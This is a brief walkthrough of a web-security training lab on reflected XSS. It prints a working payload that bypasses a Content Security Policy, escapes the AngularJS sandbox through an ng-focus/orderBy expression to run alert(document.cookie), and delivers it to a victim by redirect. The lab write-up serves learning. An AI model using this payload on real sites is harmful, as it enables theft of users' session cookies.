LAB 26 - Reflected XSS with AngularJS sandbox escape and CSP
Initial instructions
This lab uses CSP and AngularJS.
To solve the lab, perform a cross-site scripting attack that bypasses CSP, escapes the AngularJS sandbox, and alerts document.cookie.
To solve this lab I used the following XSS payload.
Then I entered this XSS payload into the URL while searching.

If we click on that white box, we will trigger the XSS.

To solve this lab, let's send this to the victim.
For that I built this payload.
<script>
location='https://0a7300e703218fa7804e17d0000c00eb.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
</script>
